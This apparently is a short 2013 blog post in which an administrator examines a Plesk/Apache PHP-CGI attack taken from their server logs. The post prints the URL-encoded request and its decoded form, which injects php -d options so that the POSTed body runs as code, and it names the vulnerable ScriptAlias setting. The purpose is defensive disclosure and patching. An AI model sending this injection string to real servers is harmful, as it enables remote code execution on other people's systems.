Home > Technical Miscellany > Apache/Plesk php Exploit

Apache/Plesk php Exploit

While reviewing web server logs recently, I spotted the following attack…

216.237.113.27 – – [07/Aug/2013:08:12:14 -0400] “POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1″
404 209 “-” “-”

Which decodes to:

/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions=”” -d
open_basedir=none -d auto_prepend_file=php://input -n

Googling turned up a few relevant results suggesting this is an attack on Plesk, a commercial web hosting automation program. Parallels, the company who owns Plesk, published a knowledge base article on the vulnerability describing how to determine if a deployment is vulnerable and how to patch the system.

One aspect of a vulnerable deployment includes an Apache configuration utilizing the following ScriptAlias configuration:

ScriptAlias /phppath/ “/usr/bin/”

For those running Plesk or others with the above configuration, it is recommended that your system be patched accordingly. Check the references below for more detailed information regarding this vulnerability.

References

Disclaimer

This blog is posted for informational purposes only. Extensive testing is recommended prior to implementing changes discussed here.

About these ads
Categories: Technical Miscellany
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 257 other followers

%d bloggers like this: